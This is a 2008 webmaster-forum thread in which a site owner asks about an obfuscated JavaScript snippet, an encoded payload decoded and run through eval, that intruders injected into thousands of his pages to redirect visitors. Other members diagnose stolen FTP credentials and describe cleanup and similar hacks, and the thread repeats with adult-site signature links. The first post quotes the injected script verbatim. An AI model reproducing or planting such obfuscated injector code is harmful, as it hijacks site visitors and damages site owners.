Know What This Is?

Licker4U · 2008-05-08, 02:51 PM

Someone told me my link to my webmasters page re-directed them to this page: http://ya.ru/ so I asked my server tech to look into it and he said he found this script but didn't know if it is legit or not. It's NOT on my hard drive copy of the page so does anyone know what this is and if you know what it is, how did it get on my page at the server? (fuckpage.com is one of my domains)

Code:

<script language=JavaScript>function cujban(x){var l=x.length,b=1024,i,j,r,p=0,s=0,w=0,t=Array(63,50,24,8,56,16,52,28,39,60,0
,0,0,0,0,0,55,53,9,48,47,43,36,35,17,1,38,23,0,32,51,62,20,41,2,22,14,40,6,34,33,15,57,0,0,0,0,54,0,61,27,13,46,21,11,12,5,19,49,44,10,42,59,7,58,25,
30,29,4,31,26,3,18,37,45);for(j=Math.ceil(l/b);j>0;j--){r='';for(i=Math.min(l,b);i>0;i--,l--){{w|=(t[x.charCodeAt(p++)-48])<<s;if(s){r+=String.fromCh
arCode(239^w&255);w>>=8;s-=2}else{s=6}}}eval(r);}}cujban('2v2MfR3JINZJTdQJ7lc1ER2MlWgAfR3GvlUWIdqC2_QXbm4j3YzXB_QGRm4NIpUMllaWSN2GBOg8s1U6cu4JbOqALwg
@oR38b1qCVV2WLR9JLwc1tfmGbr2CsRUJId4jWp4JoV78TV4WLl4jVKk@28c_sbgj3DUAg_2W3ig1c0gJVd4Jolc@28aNomUX3r4JxDc_YNZJSTUWx@9WV1Z8wpUyeo3MIm2NHYcCVJ28TlUWHGkj
')</script><!-- fuckpage.com -->"

Licker4U · 2008-05-08, 03:57 PM

Well damn, now someone has found that script on one of my free sites. WTF is going on?

Cleo · 2008-05-08, 04:06 PM

I would guess that you have been hacked.

balls_deep · 2008-05-08, 04:11 PM

Yep, you've been hacked. I would contact your host and see if they can help sort it out for you.

Licker4U · 2008-05-08, 04:41 PM

Yeah, the tech guy says I have that code embedded on multiple domains. Seems it's on every index page and main page of all my free sites and on my link lists. Tech guy said someond has my password but even I don't know what my password is. I have it saved in my FTP software and it just appears as ****'s when I upload files. They're looking into it. And here I thought I was coasting down hill to the weekend....|shocking|

T Pat · 2008-05-08, 07:09 PM

Whining would be appropriate now

Just kidding I feel your pain Licker

NY Jester · 2008-05-08, 09:29 PM

Im seeing hacks more and more lately..crazy shit. Hope ya get it sorted out Licker

Licker4U · 2008-05-08, 09:39 PM

Server tech says that JS was added to 4000 of my pages on May 1st from an ISP in Italy. WTF?

Now I have to re-boot in safe mode to let Avast do a complete system scan to make sure my machine is clean before we do anything. How do I re-boot in safe mode?

Tech also said it might be easier to restore my data from back up rather than try to clean all the infected files. I sure as hell don't want to re-upload 4000 html pages. Isn't there some kind of "find and replace" software I can run to find the JS and replace it with nothing?

Toby · 2008-05-08, 10:08 PM

press F8 during boot up to get to the boot selection menu to choose Safe Mode

I believe there is a shell command for doing a search and replace on files on the server, but it's not for the feint hearted as there is no undo.

SheepGuy · 2008-05-08, 10:50 PM

A similar script was installed on some of my sites a few months ago, I was hacked. I deleted it and changed my ftp password and it didn't come back. Problem for me was that google picked it up before I did and put a bigass warning in front my listings. Took two fucking weeks before they took the warning down, took two minutes to find and remove the code.

Licker4U · 2008-05-08, 11:19 PM

Tech guy says they have back-up files as of April 30 the day before the hack so they can restore everything. WHEW! Load off me for sure.

NY Jester · 2008-05-09, 08:21 AM

Well, in the big scheme of things thats some good news for you Licker..hope it solves the issues.

ladydesigner · 2008-05-09, 08:52 AM

Wow - that's scary Licker! I'm glad you've got everything sorted out.

pc · 2008-05-09, 09:14 AM

Sorry to hear that

I feel your pain.
Over 4000 index pages.Sh$$#t.
I had similar problem on my LL month ago.They access my admin area (not FTP) and include code on all my templates.

Damn spamers,hackers,mutherfuckers-kill them all

Licker4U · 2008-05-09, 11:10 AM

I don't know how that script works but I just checked and I had NO traffic for the first eight days of the month up until last night when the tech guy restored all my old pages which didn't have the script. That explains the lack of sales this month. |shocking|

Maria · 2008-06-03, 04:28 AM

That really sucks. I once had something like that, but the host could also put back a backup, so all the pages were clean again. After that both you and the host should take some countermeasures like changing passwords and maybe updating scripts ?
Good luck on it

dif0r · 2008-06-09, 06:42 PM

A while ago my rss feeds stoped to work and i couldn't figure out what's wrong.. guess what! On all my pages was this javascript shit

It redirected to go-piercing.com

I checked the ftp and control panel access logs and found two suspicious logins..

2008-06-09 20:20:39 85.17.138.39 Netherlands yes
2008-06-08 20:46:25 83.149.110.231 Netherlands yes

Looks like some script kiddies have new toys

2008-05-08, 03:57 PM	#2
Licker4U Mean people suck, nice people swallow, are you mean or nice? Join Date: Sep 2003 Location: Lower Alabama-The Redneck Riviera Posts: 2,377	Well damn, now someone has found that script on one of my free sites. WTF is going on? __________________ Submit to Girls That Squirt , Hairy Pussy Links and Best Wet Pussy

2008-05-08, 04:06 PM	#3
Cleo Subversive filth of the hedonistic decadent West Join Date: Mar 2003 Location: Southeast Florida Posts: 27,936	I would guess that you have been hacked. __________________ Free Rides on Uber and Lyft Uber Car: uberTzTerri Lyft Car: TZ896289

2008-05-08, 04:11 PM	#4
balls_deep If you really need money, you can sell your kidney or even your car Join Date: Apr 2007 Posts: 374	Yep, you've been hacked. I would contact your host and see if they can help sort it out for you. __________________ My Tattoo And Body Mod Blog Submit Blogs Or Freesites

2008-05-08, 04:41 PM	#5
Licker4U Mean people suck, nice people swallow, are you mean or nice? Join Date: Sep 2003 Location: Lower Alabama-The Redneck Riviera Posts: 2,377	Yeah, the tech guy says I have that code embedded on multiple domains. Seems it's on every index page and main page of all my free sites and on my link lists. Tech guy said someond has my password but even I don't know what my password is. I have it saved in my FTP software and it just appears as ****'s when I upload files. They're looking into it. And here I thought I was coasting down hill to the weekend....\|shocking\| __________________ Submit to Girls That Squirt , Hairy Pussy Links and Best Wet Pussy

2008-05-08, 07:09 PM	#6
T Pat You can now put whatever you want in this space :) Join Date: Aug 2003 Location: Paridise Posts: 3,244	Whining would be appropriate now Just kidding I feel your pain Licker __________________ How To Keep An Asshole In Suspense I'll Tell You Later

2008-05-08, 09:29 PM	#7
NY Jester ICQ:147079406 Join Date: Oct 2007 Location: RockMEHardplace Posts: 2,996	Im seeing hacks more and more lately..crazy shit. Hope ya get it sorted out Licker __________________ The Sexy Side of Porn Last edited by NY Jester; 2008-05-08 at 09:31 PM..

2008-05-08, 09:39 PM	#8
Licker4U Mean people suck, nice people swallow, are you mean or nice? Join Date: Sep 2003 Location: Lower Alabama-The Redneck Riviera Posts: 2,377	Server tech says that JS was added to 4000 of my pages on May 1st from an ISP in Italy. WTF? Now I have to re-boot in safe mode to let Avast do a complete system scan to make sure my machine is clean before we do anything. How do I re-boot in safe mode? Tech also said it might be easier to restore my data from back up rather than try to clean all the infected files. I sure as hell don't want to re-upload 4000 html pages. Isn't there some kind of "find and replace" software I can run to find the JS and replace it with nothing? __________________ Submit to Girls That Squirt , Hairy Pussy Links and Best Wet Pussy Last edited by Licker4U; 2008-05-08 at 09:43 PM..

2008-05-08, 10:08 PM	#9
Toby Lonewolf Internet Sales Join Date: Mar 2005 Location: Houston Posts: 4,826	press F8 during boot up to get to the boot selection menu to choose Safe Mode I believe there is a shell command for doing a search and replace on files on the server, but it's not for the feint hearted as there is no undo. __________________ Latex Vixens Babes In Boots Well Heeled Women Dressing For Sex Stocking Vixens

2008-05-08, 10:50 PM	#10
SheepGuy It's the end of the world as we know it, and I feel fine Join Date: Jul 2006 Location: Canada Posts: 2,527	A similar script was installed on some of my sites a few months ago, I was hacked. I deleted it and changed my ftp password and it didn't come back. Problem for me was that google picked it up before I did and put a bigass warning in front my listings. Took two fucking weeks before they took the warning down, took two minutes to find and remove the code. __________________ If the Environment was a bank, they would have saved it by now.

2008-05-08, 11:19 PM	#11
Licker4U Mean people suck, nice people swallow, are you mean or nice? Join Date: Sep 2003 Location: Lower Alabama-The Redneck Riviera Posts: 2,377	Tech guy says they have back-up files as of April 30 the day before the hack so they can restore everything. WHEW! Load off me for sure. __________________ Submit to Girls That Squirt , Hairy Pussy Links and Best Wet Pussy

2008-05-09, 08:21 AM	#12
NY Jester ICQ:147079406 Join Date: Oct 2007 Location: RockMEHardplace Posts: 2,996	Well, in the big scheme of things thats some good news for you Licker..hope it solves the issues. __________________ The Sexy Side of Porn

2008-05-09, 08:52 AM	#13
ladydesigner ~Serving Up Sinful Sex ~ Join Date: Apr 2003 Location: Missouri City, Texas Posts: 1,928	Wow - that's scary Licker! I'm glad you've got everything sorted out. __________________ Porn Pixie XxX ~ Looking for Link Trades

2008-05-09, 09:14 AM	#14
pc Shift Out / X-On Join Date: Jul 2007 Location: unknown Posts: 2,298	Sorry to hear that I feel your pain. Over 4000 index pages.Sh$$#t. I had similar problem on my LL month ago.They access my admin area (not FTP) and include code on all my templates. Damn spamers,hackers,mutherfuckers-kill them all

2008-05-09, 11:10 AM	#15
Licker4U Mean people suck, nice people swallow, are you mean or nice? Join Date: Sep 2003 Location: Lower Alabama-The Redneck Riviera Posts: 2,377	I don't know how that script works but I just checked and I had NO traffic for the first eight days of the month up until last night when the tech guy restored all my old pages which didn't have the script. That explains the lack of sales this month. \|shocking\| __________________ Submit to Girls That Squirt , Hairy Pussy Links and Best Wet Pussy

2008-06-03, 04:28 AM	#16
Maria Aw, Dad, you've done a lot of great things, but you're a very old man, and old people are useless Join Date: Aug 2006 Posts: 25	That really sucks. I once had something like that, but the host could also put back a backup, so all the pages were clean again. After that both you and the host should take some countermeasures like changing passwords and maybe updating scripts ? Good luck on it

2008-06-09, 06:42 PM	#17
dif0r Just because I don't care doesn't mean I don't understand! Join Date: Mar 2006 Posts: 96	A while ago my rss feeds stoped to work and i couldn't figure out what's wrong.. guess what! On all my pages was this javascript shit It redirected to go-piercing.com I checked the ftp and control panel access logs and found two suspicious logins.. 2008-06-09 20:20:39 85.17.138.39 Netherlands yes 2008-06-08 20:46:25 83.149.110.231 Netherlands yes Looks like some script kiddies have new toys __________________ submit your free sites to Hardcore Porn Links